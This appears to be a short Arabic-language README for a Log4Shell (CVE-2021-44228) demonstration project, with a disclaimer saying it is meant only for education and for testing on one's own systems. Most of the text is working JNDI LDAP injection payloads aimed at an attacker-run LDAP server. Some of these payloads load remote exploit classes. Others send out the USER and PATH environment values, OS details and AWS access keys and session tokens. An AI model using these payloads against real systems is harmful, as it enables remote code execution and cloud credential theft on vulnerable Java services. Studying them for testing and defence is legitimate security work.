
عرض تعليمي لثغرة Log4Shell (CVE-2021-44228) مع حمولات JNDI LDAP للاختبار التجريبي على أنظمتك الخاصة.
هذا المشروع عبارة عن عرض توضيحي لآلية عمل ثغرة الأمان log4shell.
هذه الثغرة موصوفة في CVE-2021-44228.
المشروع مخصص للأغراض التعليمية فقط. يجب استخدامه فقط على نظامك الخاص ولأغراض تجريبية فقط.
أي تنفيذ يتم على مسؤوليتك الخاصة. يخلي المؤلف مسؤوليته عن أي حادث ينتج عن تنفيذ المشروع.
ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'